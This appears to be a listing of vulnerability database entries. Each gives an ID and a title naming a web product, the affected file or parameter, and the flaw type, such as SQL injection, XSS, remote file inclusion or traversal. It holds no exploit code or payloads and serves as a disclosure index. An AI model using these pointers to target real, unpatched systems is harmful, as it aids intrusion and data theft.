[45399] web-app.org WebAPP cgi-bin/cgi-lib/forum_display.pl displaypost Function User Display Weakness
[45398] web-app.org WebAPP cgi-bin/cgi-lib/search.pl Search String Multiple Function XSS
[45396] web-app.org WebAPP Multiple Unspecified Form Input Validation Issues
[45395] web-app.org WebAPP Crafted QUERY_STRING Unspecified Arbitrary File Manipulation
[45387] Mjguest interface/redirect.htm.php goto Variable Arbitrary Site Redirect
[45386] Multiple Vendor WebAPP Multiple Administration Functions CSRF
[45369] how2ASP Webboard showQAnswer.asp qNo Parameter SQL Injection
[45319] CMS WebManager-Pro index.php Multiple Parameter SQL Injection
[45302] IBM WebSphere MQ Multiple Unspecified Remote Issues
[45300] Aida-Web frame.html Multiple Variable Authentication Bypass Information Disclosure
[45294] WebEx GpcContainer.GpcContainer.1 ActiveX Multiple Method Unspecified DoS
[45286] Firefly Media Server webserver.c ws_addarg Function /xml-rpc Authorization Header Remote Format String
[45266] Interspire ActiveKB Admin Interface Crafted Cookie Authentication Bypass
[45218] Microsoft Outlook Web Access Cache-Control Directive Information Caching Persistence
[45167] WebGroupCommunicationCenter (WGCC) message.php Multiple Parameter SQL Injection
[45166] WebGroupCommunicationCenter (WGCC) profile.php userid Parameter XSS
[45165] WebGroupCommunicationCenter (WGCC) profile.php id Parameter SQL Injection
[45164] WebGroupCommunicationCenter (WGCC) schedule.php id Parameter SQL Injection
[45163] WebGroupCommunicationCenter (WGCC) filebase.php id Parameter SQL Injection
[45162] WebGroupCommunicationCenter (WGCC) picturegallery.php bildid Parameter SQL Injection
[45067] WHM Interface for cPanel scripts2/listaccts search Parameter XSS
[45066] WHM Interface for cPanel scripts2/changeip user Parameter XSS
[45065] WHM Interface for cPanel scripts2/knowlegebase issue Parameter XSS
[45043] BIGACE Web CMS jstree.php GLOBALS[_BIGACE][DIR][admin] Parameter Remote File Inclusion
[45042] BIGACE Web CMS item_information.php GLOBALS[_BIGACE][DIR][admin] Parameter Remote File Inclusion
[45041] BIGACE Web CMS plugin.php GLOBALS[_BIGACE][DIR][admin] Parameter Remote File Inclusion
[45040] BIGACE Web CMS AdoDBConnection.php GLOBALS[_BIGACE][DIR][addon] Parameter Remote File Inclusion
[45039] BIGACE Web CMS function.captcha.php GLOBALS[_BIGACE][DIR][addon] Parameter Remote File Inclusion
[44986] eGroupWare Web Server Write Access Unspecified
[44985] RSA Authentication Agent WebID/IISWebAgentIF.dll FTP url Variable Arbitrary Site Redirect
[44984] RSA Authentication Agent IISWebAgentIF.dll postdata Parameter URL-Encoded XSS
[44980] Verizon Actiontec Modem Admin Interface Port External Exposure Persistence Weakness
[44957] IBM WebSphere Application Server (WAS) Java Plugin Untrusted Applet Privilege Escalation
[44951] Zarafa Webaccess Email Subject Preview Pane XSS
[44950] Zarafa Webaccess Email Headers XSS
[44948] Sun Java System Web Server / Application Server Unspecified JSP Source Disclosure
[44850] Sun Java System Web Server lib/webapps/search/index.jps XSS
[44832] Softbiz Web Host Directory Script search_result.php host_id Parameter SQL Injection
[44830] WebGUI Data Form List View Unspecified Security Issue
[44817] Mjguest interface/redirect.htm.php level Parameter XSS
[44813] Novell GroupWise WebAccess JPG File Handling XSS
[44805] Maian Weblog admin/inc/header.php Multiple Parameter XSS
[44804] Maian Weblog admin/index.php keywords Parameter XSS
[44803] Maian Weblog index.php keywords Parameter XSS
[44795] Miniweb index.php Multiple Parameter SQL Injection
[44776] Cezanne PeopleWeb/CznDocFolder/CznDFStartProcess.asp Multiple Parameter XSS
[44775] Cezanne PeopleWeb/Cards/PayrollCard.asp Multiple Parameter XSS
[44774] Cezanne PeopleWeb/Cards/CVCard.asp PersonOid Parameter XSS
[44760] Grape Web Statistics includes/functions.php location Parameter Remote File Inclusion
[44704] H-Sphere Webshell4 /webshell4/viewer.php fn Parameter Arbitrary File Access
[44702] H-Sphere Webshell4 302 Response Manipulation Access Bypass
[44691] IBM WebSphere MQ Multiple Unspecified Remote DoS
[44687] IBM WebSphere MQ MQSeries runmqsc Access Restriction Bypass
[44682] WEBrick in Ruby URI Multiple Encoded Traversal Arbitrary File Access
[44554] Oracle Application Server Web Cache Admin Password Plaintext Disclosure
[44538] Akiva WebBoard Profile Update Feature Form Field XSS
[44536] Web Calendar Pro one_day.php user_id Parameter SQL Injection
[44525] Oracle Application Server Crafted Request WEB-INF Directory Information Disclosure
[44468] Apple Safari WebKit URL Hostname XSS
[44458] Microsoft Works WkImgSrv.dll WksPictureInterface Property Remote DoS
[44419] EMC DiskXtender RPC Interface Default Hardcoded Account
[44418] EMC DiskXtender File System Manager RPC Interface Remote Overflow
[44417] EMC DiskXtender MediaStor RPC Interface Remote Format String
[44396] mxbBB mx_blogs includes/functions_weblog.php mx_root_path Parameter Remote File Inclusion
[44377] Nortel Networks Communication Server 1000 Web Resources Unspecified Information Disclosure
[44324] Highwall Multiple Products Management Interface Endpoint Workstation Name XSS
[44323] Highwall Multiple Products Management Interface Sensor WIDS Name XSS
[44322] Highwall Multiple Products Management Interface Crafted SSID XSS
[44321] Highwall Multiple Products Management Interface Crafted SSID SQL Injection
[44281] Interwoven WorkSite Web TransferCtrl Class ActiveX (iManFile.cab) SendNrlLink Directive Handling Memory Consumption DoS
[44263] IBM WebSphere Application Server (WAS) FFDC Log Multiple Cleartext Password Disclosure (PK10136)
[44262] IBM WebSphere Application Server (WAS) Samples Unspecified XSS (PK13968)
[44261] IBM WebSphere Application Server (WAS) Default Messaging Component Exception Destination Unspecified Issue
[44260] IBM WebSphere Application Server (WAS) Login Form Redirection HTTP Transport Persistence
[44259] IBM WebSphere Application Server (WAS) ORB Comm Trace Cleartext Credential Disclosure
[44258] IBM WebSphere Application Server (WAS) Startup LDAPUserRegistry Cleartext Password Disclosure
[44233] Interwoven WorkSite Web TransferCtrl Class ActiveX (iManFile.cab) Server Property Double-free Arbitrary Code Execution
[44232] IBM WebSphere Application Server (WAS) resources.xml Cleartext Password Disclosure
[44230] IBM WebSphere Application Server (WAS) Loose Configuration Default Application Profile/Access Intent Persistence
[44229] IBM WebSphere Application Server (WAS) Malformed HTTP Header DoS
[44228] IBM WebSphere Application Server (WAS) Ciphersuite Downgrade Weakness
[44227] IBM WebSphere Application Server (WAS) com.ibm.security.SAF.Authz.Log.Option Cross Role Log Information Disclosure
[44226] IBM WebSphere Application Server (WAS) Custom Properties Cleartext Password Disclosure
[44225] IBM WebSphere Application Server (WAS) Java Management Extensions (JMX) Trace Output Unspecified Information Disclosure (PK21335)
[44223] IBM WebSphere Application Server (WAS) Web Services Security UserNameToken Cache Improper Use
[44222] IBM WebSphere Application Server (WAS) on z/OS Revoked User Status Authentication Bypass
[44221] IBM WebSphere Application Server (WAS) SSL Certificate CN Validation Weakness
[44220] IBM WebSphere Application Server (WAS) Servlet Engine/Web Container Remote Overflow
[44217] IBM WebSphere Application Server (WAS) Samples Component Unspecified Exposure (PK40213)
[44207] Neat weblog index.php articleId Parameter SQL Injection
[44204] IBM WebSphere Application Server (WAS) for z/OS Trace Output Information Disclosure (PK25568)
[44203] IBM WebSphere Application Server (WAS) for z/OS Unspecified Exposure (PK25740)
[44202] IBM WebSphere Application Server (WAS) for z/OS Java Management Extensions (JMX) Configuration Object Unspecified Exposure
[44187] OTRS (Open Ticket Request System) SOAP Interface Unauthenticated Object Manipulation
[44180] Sun Java System Directory Server Admin Interface Unspecified Exposure
[44168] SmarterMail Web Server (SMWebSvr.exe) HTTP Request Handling Remote DoS
[44128] Nortel iSD-SSL Management Interface Direct Access Weakness
[44122] Nortel Multiple Products Browser-Based Management Interface (BBI) Unspecified Directory Traversal
[44121] Nortel Multiple Products Browser-Based Management Interface (BBI) Unspecified XSS
[44117] RoundCube Webmail Style Sheet Expression Commands XSS
[44108] Webster HTTP Server URL XSS
[44107] Webster HTTP Server URL Traversal Arbitrary File Access
[44106] Webster HTTP Server URL Handling Remote Overflow
[44068] webSPELL index.php board Parameter XSS
[44061] Mitsubishi Electric GB-50 / GB-50A Web Controller servlet/MIMEReceiveServlet setRequest Command Remote DoS
[44039] Borland CaliberRM StarTeam Multicast Service (STMulticastService) PGMWebHandler::parse_request Remote Overflow
[44037] WebWasher on Linux URL Handling Remote DoS
[43985] Webform Module for Drupal Unspecified XSS
[43980] Apple Safari WebKit (JavaScriptCore/pcre/pcre_compile.cpp) PCRE Nested Repetition Count Overflow
[43974] Blackboard Academic Suite webapps/blackboard/execute/viewCatalog searchText Parameter XSS
[43972] Simple Web Server (SWS) Traversal Arbitrary File Access
[43950] Aeries Browser Interface loginproc.asp UserName Parameter XSS
[43949] Aeries Browser Interface GradebookOptions.asp GrdBk Parameter SQL Injection
[43928] SLMail Pro Web Service (webcontainer.exe) HTTP Parameter Handling Overflow DoS
[43927] SLMail Pro Web Service (webcontainer.exe) URI Handling Memory Corruption DoS
[43899] VMware Multiple Products Crafted Virtual Machine Communication Interface (VMCI) Calls DoS
[43844] RSA SecurID WebID RSA Authentication Agent (IISWebAgentIF.dll) postdata Variable Blacklist Bypass
[43804] FreeWebshop.org customer.php Unspecified Remote Privilege Escalation
[43794] Cisco IOS PPTP Session Termination Virtual Access Interface (IDB) Exhaustion DoS
[43759] Puzzle Apps CMS core/modules/webstat/MEC/index.php THISDIR Parameter Remote File Inclusion
[43744] HIS-Webshop cgi-bin/his-webshop.pl t Parameter Traversal Arbitrary File Access
[43734] Aeries Browser Interface loginproc.asp SchlCode Parameter SQL Injection
[43733] Aeries Browser Interface Login.asp usr Parameter XSS
[43710] Kvaliitti WebDoc subcategory.asp Multiple Parameter SQL Injection
[43709] Kvaliitti WebDoc categories.asp Multiple Parameter SQL Injection
[43704] Nortel VPN Gateway Browser-Based Management Interface (BBI) Username Remote Overflow
[43500] MYweb4net Browser Object Tag outerHTML Attribute Cross-domain Information Disclosure
[43450] IBM WebSphere HTTP Request Smuggling
[43449] BEA WebLogic HTTP Request Smuggling
[43447] Sun SunONE Web Server HTTP Request Smuggling
[43418] Uebimiau Webmail sess[auth] Variable Remote Authentication Bypass
[43368] Apple Safari WebKit Cross-frame Method Instance XSS
[43367] Apple Safari WebKit JavaScript Crafted Regex Handling Remote Overflow
[43366] Apple Safari WebCore History Object Modification XSS
[43365] Apple Safari WebCore document.domain Property XSS
[43364] Apple Safari WebCore Java Applet Frame Navigation Policy Bypass
[43363] Apple Safari WebCore window.open Function Page Security Context Modification XSS
[43362] Apple Safari WebCore Kotoeri Input Method Password Disclosure
[43361] Apple Safari WebCore Web Inspector Unspecified XSS
[43360] Apple Safari WebCore document.domain property Unspecified XSS
[43322] Direct Web Remoting (DWR) Framework JavaScript Object Notation (JSON) Crafted HTML Remote Data Disclosure
[43321] Google Web Toolkit (GWT) Framework JavaScript Object Notation (JSON) Crafted HTML Remote Data Disclosure
[43294] Ariadne CMS web-loader Unspecified Session Password Disclosure
[43251] Apple Safari KHTML WebKit Crafted Web Page Remote DoS
[43244] WebChat Module for eXV2 index.php roomid Parameter SQL Injection
[43226] Mozilla Firefox DIV Tag Web Forgery Warning Bypass
[43219] PHP cURL Library (libcurl) curl/interface.c Crafted file:// Request Restriction Bypass
[43188] Web Wiz Multiple Products RTE_file_browser.asp Traversal Remote File / Directory Disclosure
[43185] Webmatic Multiple Unspecified XSS
[43184] Webmatic Unspecified SQL Injection
[43182] Google Android SDK WebKit Framework GIF Library GIF Handling Overflow
[43176] Ability Mail Server WebMail Auto-Signup Cloned User Information Disclosure
[43168] GoAhead WebServer goform/QuickStart_c0 typepassword Field Password Disclosure
[43167] IBM WebSphere MQ XA PROCESS_DUP_HANDLE Arbitrary Process Hijacking Local Privilege Escalation
[43143] Webmedia Explorer templates/sidebar.tpl.php path_templates Parameter Remote File Inclusion
[43142] Webmedia Explorer templates/folder_messages_link_message_name.tpl.php path_template Parameter Remote File Inclusion
[43141] Webmedia Explorer templates/main.tpl.php path_template Parameter Remote File Inclusion
[43140] Webmedia Explorer includes/rss.class.php path_include Parameter Remote File Inclusion
[43038] D-Bus dbus-daemon send_interface Local Security Policy Bypass
[43025] ZyXEL P-2602HW-D1A Router Forms/RemMagWWW_1 WWWAccessInterface Parameter CSRF
[43024] Cisco Linksys WRT54G Router FTP Interface Username / Password Remote DoS
[43019] D-Link DSL-G604T Router cgi-bin/webcm var:category Parameter XSS
[42997] Adobe ColdFusion Admin Interface Failed Login Logging Weakness
[42981] SurgeMail webmail.exe page Variable Remote Format String
[42939] Philips VOIP841 Default Install Web Console Admin Password
[42929] WebcamXP Multiple Script Array Index Error Remote DoS
[42928] WebcamXP /show_gallery_pic id Variable Arbitrary Memory Disclosure
[42927] WebcamXP /pocketpc camnum Variable Arbitrary Memory Disclosure
[42905] IEA Multiple Products Management Web Server Remote Memory Corruption
[42888] Website META Language (WML) wml_backend/p1_ipp/ipp.src ipp.$$.tmp Symlink Arbitrary File Overwrite
[42887] Website META Language (WML) wml_backend/p3_eperl/eperl_sys.c Temp Files Symlink Arbitrary File Overwrite
[42886] Website META Language (WML) wml_contrib/wmg.cgi /tmp/pe.tmp.$$ Symlink Arbitrary File Overwrite
[42881] IBM WebSphere Application Server (WAS) startserver.log Unspecified Cleartext Information Disclosure (PK53198)
[42880] IBM WebSphere Application Server (WAS) trace Unspecified Information Disclosure
[42879] IBM WebSphere Application Server (WAS) Monitor Role Users Unspecified Issue
[42878] IBM WebSphere Application Server (WAS) http_plugin.log Unspecified Cleartext Information Disclosure (PK48785)
[42869] Documentum Administrator / Webtop dmclTrace.jsp filename Variable Unrestricted Upload Arbitrary File Overwrite
[42864] Skype Internet Explorer Web Control Video Gallery Metacafe Movie Title Cross-zone Scripting
[42863] Skype Internet Explorer Web Control Dailymotion Title Field Cross-zone Scripting
[42826] BitTorrent Web UI HTTP Request Range Header Processing DoS
[42825] uTorrent Web UI HTTP Request Range Header Processing Overflow
[42796] Neptune Web Server 404 Error Page XSS
[42781] MiniWeb HTTP Server http.c mwGetLocalFileName Function Encoded Traversal Arbitrary File/Directory Access
[42780] MiniWeb HTTP Server http.c _mwProcessReadSocket Function URI Handling Remote Overflow
[42737] WebCT Campus Edition Discussion Board Message XSS
[42736] WebCT Campus Edition Mail Message XSS
[42720] Eye-Fi Web Server Crafted WS-Proxy Request Remote DoS
[42712] Microsoft Office Web Components DataSource Page Handling Arbitrary Code Execution
[42711] Microsoft Office Web Components URL Parsing Arbitrary Code Execution
[42703] Sun Java Web Console Remote File Existence Enumeration
[42687] MyABraCaDaWeb header.php ma_kw Parameter XSS
[42679] Falcon Web Server URI Multiple Error Message XSS
[42674] PHP Webquest admin/backup_phpwebquest.php Direct Request Database Credentials Disclosure
[42632] WebGUI Secondary Admin Privilege Escalation
[42626] BarracudaDrive Web Server Crafted Request Script Source Disclosure
[42625] BarracudaDrive Web Server Group Chat /eh/chat.ehintf/C. Remote DoS
[42624] BarracudaDrive Web Server URI Path Trace Page XSS
[42623] BarracudaDrive Web Server /drive/c/bdusers/USER/ dir Variable Traversal Arbitrary File Manipulation
[42622] BarracudaDrive Web Server URL Path Traversal Arbitrary File Access
[42616] Ruby WEBrick WEBrick::HTTPServ* :NondisclosureName Option Mixed Case Arbitrary File Access
[42615] Ruby WEBrick WEBrick::HTTPServ* Encoded Traversal Arbitrary File Access
[42606] WebContent M1 redirect.do sid Parameter XSS
[42602] Sun Java Web Start Application JNLP File Handling Overflow (6660121)
[42596] Sun Java Web Start Untrusted Application Unspecified Privilege Escalation (6611594)
[42595] Sun Java Web Start Untrusted Application Unspecified Privilege Escalation (6623233)
[42594] Sun Java Web Start useEncodingDecl() Function XML Header Parsing Overflow
[42593] Sun Java Web Start Unspecified Application Handling Overflow (6605187)
[42592] Sun Java Web Start Unspecified Application Handling Overflow (6605184)
[42585] Easy File Sharing Web Server Crafted User Name File Content Disclosure
[42584] Easy File Sharing Web Server Direct Request .sdb Database File Disclosure
[42583] Easy File Sharing Web Server Traversal Arbitrary File Upload
[42547] Portail Web Php template/Bleu/index.php site_path Parameter Remote File Inclusion
[42546] Portail Web Php template/Noir/index.php site_path Parameter Remote File Inclusion
[42545] Portail Web Php template/Vert/index.php site_path Parameter Remote File Inclusion
[42543] PHP-Nuke modules/Web_Links/index.php lid Parameter SQL Injection
[42528] Ripe Website Manager admin/pages/do_new_page.php Multiple Parameter SQL Injection
[42527] Ripe Website Manager admin/navigation/do_new_nav.php new_menuname Parameter SQL Injection
[42526] Ripe Website Manager admin/navigation/do_new_item.php Multiple Parameter SQL Injection
[42525] Ripe Website Manager navigation/delete_item.php id Parameter SQL Injection
[42524] Ripe Website Manager navigation/delete_menu.php id Parameter SQL Injection
[42523] Ripe Website Manager pages/delete_page.php id Parameter SQL Injection
[42497] Jetty Dump Servlet (webapps/test/jsp/dump.jsp) Unspecified XSS
[42448] ZyXEL ZyWALL 2 ZyNOS Management Interface Invalid Config Data Infinite Reboot Remote DoS
[42421] Acunetix Web Vulnerability Scanner White Space URL Arbitrary Program Execution
[42362] IBM WebSphere SVRCONN MQ Client Queue Manager Security Bypass
[42345] BEA WebLogic WSDL / Security Policy Unspecified Remote Disclosure
[42314] Bajie Http Web Server Query String XSS
[42289] Rising Online Virus Scanner Rising Web Scan Object ActiveX (OL2005.dll) UpdateEngine() Method Arbitrary File Download
[42267] IBM Lotus Domino Web Access Unspecified Remote Issue
[42249] Web_Links Module for PHP-Nuke module.php cid Parameter SQL Injection
[42215] Aeries Browser Interface GradebookStuScores.asp GrdBk Parameter SQL Injection
[42209] Porar Webboard question.asp QID Parameter SQL Injection
[42120] Kerio MailServer WebMail Arbitrary Meeting Manipulation
[42116] Aeries Browser Interface ClassList.asp Term Parameter SQL Injection
[42115] Aeries Browser Interface Labels.asp Term Parameter SQL Injection
[42114] Aeries Browser Interface Comments.asp FC Parameter SQL Injection
[42113] Aeries Browser Interface title Field XSS
[42104] MyWebFTP pass/pass.txt Direct Request Remote Ciphertext Password Disclosure
[42032] Progress Webspeed OpenEdge Messenger _cpyfile.p Arbitrary Command Execution
[42027] Hitachi Web Server Server-status Page Creation Unspecified XSS
[42026] Hitachi Web Server SSL Client Certification Validation Weakness
[41901] BEA WebLogic Administrator Console /console/login/LoginForm.jsp Session Fixation
[41900] BEA WebLogic Account Lockout Bypass Brute Force Weakness
[41899] BEA WebLogic Multiple Unspecified XSS
[41898] BEA WebLogic Proxy Servlet Request Unspecified Privilege Escalation
[41897] BEA WebLogic Crafted URL Unspecified Remote DoS
[41896] BEA WebLogic Portal Entitlement Policy Failure
[41895] BEA WebLogic JMS Topic Destination Security Policy Bypass
[41894] BEA WebLogic Protected Distributed Queue Message Sending
[41893] BEA WebLogic Console's Unexpected Exception Page XSS
[41892] BEA WebLogic config.xml Cleartext Database Password Disclosure
[41891] BEA WebLogic Apache Beehive NetUI Page Flow Unspecified XSS
[41890] BEA WebLogic Workshop NetUI Page Flow Unspecified XSS
[41889] BEA WebLogic Portal Administration Console HTTP Session Downgrade
[41888] BEA WebLogic Request Header Manipulation Unspecified Privilege Escalation
[41887] BEA WebLogic Portal Page Editing Operations Unspecified Security Policy Failure
[41886] BEA WebLogic Portal Floatable Portlet Instance Entitlement Bypass
[41885] BEA WebLogic Workshop NetUI Page Flows Unspecified XSS
[41884] BEA WebLogic Portal WLP Groupspace Unspecified XSS
[41883] WebGUI New User Creation Username XSS
[41880] BEA WebLogic Mobility Server Image Converter Unspecified Resource Access
[41873] Macrovision FLEXnet Connect MVSNCLientWebAgent61.WebAgent ActiveX (isusweb.dll) DownloadAndExecute Method Arbitrary Code Execution
[41871] Mono on Windows System.Web StaticFileHandler.cs Crafted Request Source Code Disclosure
[41867] LiteSpeed Web Server MIME Type Injection Null Byte Script Source Code Disclosure
[41850] MPCSoftWeb Photo mpcsoftweb_photo.mdb Direct Request Database Disclosure
[41801] artmedic webdesign weblog artmedic_print.php date Parameter Traversal Arbitrary File Access
[41800] artmedic webdesign weblog index.php ta Parameter Traversal Arbitrary File Access
[41791] ATutor User Profile Website Field XSS
[41766] eXtremail Admin Interface LOGIN Command Remote Overflow
[41760] XPWeb Download.php url Parameter Arbitrary File Access
[41731] Archangel Weblog index.php index Parameter Traversal Arbitrary File Access
[41688] IBM WebSphere Application Server (WAS) Administrative Console Unspecified Issue
[41673] Gallery WebDAV Module PROPPATCH Method XSS
[41663] Gallery WebDAV Module View Unspecified Issue
[41659] Gallery WebCam Module Proxied Request Unspecified Issue
[41657] Gallery WebDAV Module Unspecified File Manipulation
[41653] Gateway Weblaunch weblaunch.ocx WebLaunch.WeblaunchCtl DoWebLaunch Method Traversal Arbitrary Program Execution
[41652] Gateway Weblaunch weblaunch.ocx WebLaunch.WeblaunchCtl DoWebLaunch Method Overflow Arbitrary Code Execution
[41649] TYPOlight webCMS preview.php src Variable Arbitrary File Download
[41646] IBM WebSphere Application Server (WAS) http_plugin.log Unspecified Cleartext Information Disclosure (PK45768|PK52709)
[41645] IBM WebSphere Application Server (WAS) PropFilePasswordEncoder Utility Unspecified Issue
[41644] IBM WebSphere Application Server (WAS) Web Container Cross-Request Information Disclosure
[41638] The Dawn of Time websrv.cpp HTTP Server Multiple Authentication Field Remote Format String
[41627] IBM WebSphere Business Modeler Unspecified Repository Restriction Bypass
[41619] IBM WebSphere uddigui/navigateTree.do Multiple Parameter CSRF
[41618] IBM WebSphere uddigui/navigateTree.do Multiple Parameter XSS
[41617] IBM WebSphere Application Server (WAS) Edge Component Unspecified Issue (PK44789)
[41616] IBM WebSphere Application Server (WAS) Default Messaging Component SSL Client Race Condition Overflow
[41615] IBM WebSphere Application Server (WAS) Unspecified Issue (PK33799)
[41614] IBM WebSphere Application Server (WAS) Default Messaging Component Unspecified Remote DoS
[41613] IBM WebSphere Application Server (WAS) Default Messaging Component Unspecified Issue
[41612] IBM WebSphere Application Server (WAS) Samples Component Unspecified XSS
[41611] IBM WebSphere Application Server (WAS) PD Tools Component Unspecified Issue (PK33803)
[41609] IBM WebSphere Application Server (WAS) Specific JSP URL Information Disclosure (PK20181)
[41608] IBM WebSphere Application Server (WAS) Special URI Unspecified Information Disclosure
[41607] IBM WebSphere Application Server (WAS) Unspecified Exposure (PK26123)
[41606] IBM WebSphere Application Server (WAS) SimpleFileServlet Crafted Request Information Disclosure
[41605] IBM WebSphere Application Server (WAS) Servlet Engine/Web Container Unspecified Issue
[41604] IBM WebSphere Application Server (WAS) Java Message Service (JMS) Unspecified Remote DoS
[41603] IBM WebSphere Application Server (WAS) fileServingEnabled Functionality JSP Source Disclosure (PK32374)
[41602] IBM WebSphere Application Server (WAS) SWAM Transformation Code security.xml Overwrite Weakness
[41600] IBM WebSphere Application Server (WAS) Security Bindings Validation Failure
[41580] phpWebFileManager plugins/file.php fm_path Parameter Traversal Arbitrary File Access
[41532] artmedic weblog index.php jahrneu Parameter XSS
[41531] artmedic weblog artmedic_print.php date Parameter XSS
[41472] Portail Web Php system/login.php site_path Parameter Remote File Inclusion
[41471] Portail Web Php modules/conf_modules.php site_path Parameter Remote File Inclusion
[41470] Portail Web Php menu/item.php site_path Parameter Remote File Inclusion
[41469] Portail Web Php config/conf-activation.php site_path Parameter Remote File Inclusion
[41468] Microsoft FoxPro ActiveX Web Page Parsing Unspecified Memory Corruption
[41460] Microsoft WebDAV Mini-Redirector Response Handling Arbitrary Code Execution
[41445] Microsoft IIS ASP Web Page Input Unspecified Arbitrary Code Execution
[41389] FSD servinterface.cc servinterface::sendmulticast Function PIcallsign Command Remote Overflow
[41369] CA BrightStor ARCServe Backup Message Engine (mediasvr.exe) RPC Interface 0x10d opnum Remote Overflow
[41285] IBM WebSphere Edge Server Caching Proxy Error Page XSS
[41276] WebCalendar search.php adv Parameter XSS
[41275] WebCalendar pref.php Query String XSS
[41274] WebCalendar Event Description XSS
[41168] Sejoong Namo ActiveSquare6 Namo Web Editor NamoInstaller.NamoInstall ActiveX (NamoInstaller.dll) Install Method Arbitrary Code Execution
[41128] Mindmeld acweb/admin_index.php MM_GLOBALS[home] Parameter Remote File Inclusion
[41117] Webmin/Usermin webmin_search.cgi search Parameter XSS
[41104] Webmatic Unspecified SQL Injection
[41102] VHD Web Pack index.php page Parameter Local File Inclusion
[41091] Microsoft IIS webhits.dll Hit-Highlighting Authentication Bypass
[41087] Open WebMail (OWM) openwebmail-abook.pl Multiple Parameter XSS
[41086] Open WebMail (OWM) openwebmail-advsearch.pl folder Parameter XSS
[41085] Open WebMail (OWM) openwebmail-webdisk.pl Multiple Parameter XSS
[41084] Open WebMail (OWM) openwebmail-folder.pl Multiple Parameter XSS
[41083] Open WebMail (OWM) openwebmail-send.pl Multiple Parameter XSS
[41082] Open WebMail (OWM) openwebmail-prefs.pl Multiple Parameter XSS
[41081] Open WebMail (OWM) openwebmail-main.pl Multiple Parameter XSS
[41066] Proverbs Web Calendar caladmin.inc.php Multiple Parameter SQL Injection
[41028] Web Oddity URI Traversal Arbitrary File Access
[40968] Sun Java System Web Proxy Server Unspecified FTP Request Handling DoS
[40967] Sun Java System Web Proxy Server virt-map Directive Malformed host-regex Argument Remote DoS
[40966] Sun Java System Web Proxy Server sockd Daemon Domain Name Address Type Handling Overflow
[40965] Sun Java System Web Proxy Server sockd Daemon s5auth_userpass() Function Overflow
[40964] Sun Java System Web Proxy Server Malformed Cache-control Header DoS
[40955] 360 Web Manager form.php IDFM Parameter SQL Injection
[40954] IBM Lotus Domino Web Access Upload Module (dwa7w.dll) Multiple ActiveX General_ServerName Property Overflow
[40932] Foojan WMS PHP Weblog index.php story Parameter SQL Injection
[40920] Web Wiz Rich Text Editor RTE_popup_save_file.asp Unspecified Remote File Upload
[40890] HP Virtual Rooms Install WebHPVCInstall.HPVirtualRooms14 ActiveX (HPVirtualRooms14.dll) Multiple Property Overflow
[40881] DVRHOST Web CMS OCX PdvrAtl.PdvrOcx ActiveX (PDVRATL.DLL) TimeSpanFormat() Method Overflow
[40851] Sun Java System Web Proxy Server View URL Database Functionality Unspecified XSS
[40850] Sun Java System Web Proxy Server Unspecified XSS (6566204)
[40849] Sun Java System Web Proxy Server Unspecified XSS (6611356)
[40848] Sun Java System Web Proxy Server View Error Log Functionality XSS
[40847] Tripwire Enterprise Web Management Login Page XSS
[40825] webSPELL admin/admincenter.php CSRF
[40824] webSPELL index.php sort Parameter XSS
[40817] Solaris Volume Manager (SVM) ioctl Interface Unspecified Local DoS
[40809] IBM WebSphere Application Server (WAS) Utility Classes Unspecified Security Issue
[40772] Webmin Crafted URL Unspecified Arbitrary Command Execution
[40771] British Telecommunications Business Connect webhelper btwebcontrol.dll ActiveX Multiple Unspecified Overflows
[40769] Yamaha RT Series Routers Multiple Management Interface CSRF
[40741] webdesproxy webdesproxy.c process_connection_request Function Overflow Remote Code Execution
[40723] Apple Multiple Products WebKit Page Subframe Navigation XSS
[40688] Apple Mac OS X WebKit Safari PDF Preview Temp File Information Disclosure
[40687] Apple Mac OS X WebKit Safari Indirect Proxy TCP Traffic Manipulation
[40667] Apple Mac OS X WebCore File Upload Unspecified Remote Form Field Manipulation
[40666] Apple Mac OS X WebCore Safari Page Transition Third Party Site Form Information Disclosure
[40665] Apple Mac OS X WebCore Browser History Memory Corruption Unspecified Code Execution
[40623] The Online Web Library Site src/scripture.php pageHeaderFile Parameter Remote File Inclusion
[40595] Xitami Web Server xitami.exe If-Modified-Since Header Remote Overflow
[40594] Xitami Web Server xigui32.exe If-Modified-Since Header Remote Overflow
[40581] Open WebMail (OWM) Multiple Unspecified XSS
[40515] IBM WebSphere Application Server (WAS) serveServletsByClassnameEnabled Unspecified Issue
[40514] OKI C5510MFP Printer Configuration Interface Password Disclosure
[40488] Web Wiz NewsPad RTE_file_browser.asp sub Parameter Traversal Arbitrary File Access
[40487] Web Wiz Rich Text Editor RTE_file_browser.asp sub Parameter Traversal Arbitrary File Access
[40485] Web Wiz Forums file_browser.asp sub Parameter Traversal Arbitrary File Access
[40484] Web Wiz Forums RTE_file_browser.asp sub Parameter Traversal Arbitrary File Access
[40444] MailBee WebMail Pro File download_view_attachment.aspx temp_filename Parameter Traversal Arbitrary File Access
[40430] IBM AIX sysmgt.websm.webaccess WebSM Remote Client Files Unspecified Permission Weakness
[40408] Small Axe Weblog linkbar.php Multiple Parameter Remote File Inclusion
[40383] PHP Webquest soporte_horizontal_w.php id_actividad Parameter SQL Injection
[40354] MailEnable Professional Web Administration Cleartext User Password Disclosure
[40291] Site2Nite Real Estate Web default.asp Multiple Parameter SQL Injection
[40272] FreeWebshop index.php Multiple Parameter SQL Injection
[40265] WebPortal CMS actions.php lostpass Action Remote Arbitrary Account Access
[40251] SurgeMail Webmail Host Header Handling Remote DoS
[40240] iMesh IMWeb.IMWebControl ActiveX (IMWeb.dll) ProcessRequestEx Method Empty String DoS
[40239] iMesh IMWeb.IMWebControl ActiveX (IMWeb.dll) SetHandler Method Arbitrary Code Execution
[40231] Novell NetWare Enterprise Web Server webacc Servlet error Variable Remote HTT File Access
[40226] samPHPweb songinfo.php songid Parameter SQL Injection
[40215] WebPortal CMS actions.php user_name Parameter SQL Injection
[40201] Uebimiau Webmail error.php selected_theme Parameter Arbitrary File Access
[40169] IBM WebSphere Application Server (WAS) Administrative Scripting Tools Unspecified Security Bypass
[40157] WebEvent webevent.pl cmd Parameter XSS
[40156] WebEvent webevent.cgi cmd Parameter XSS
[40137] NetAlert Web Filter Unspecified Local Bypass
[40039] Oracle Database Help for Web HTTP Unspecified Remote Issue
[40022] Oracle E-Business Suite Self-Service Web Applications HTTP Unspecified Issue
[39992] Oracle Database Program Interface Unspecified Remote DoS
[39980] Macrovision InstallShield Update Service Web Agent ActiveX DownloadAndExecute Method Arbitrary Code Execution
[39947] Oracle E-Business Suite iProcurement Self Service Web User Remote Information Disclosure
[39917] samPHPweb Template for SAM Broadcaster common/db.php commonpath Parameter Remote File Inclusion
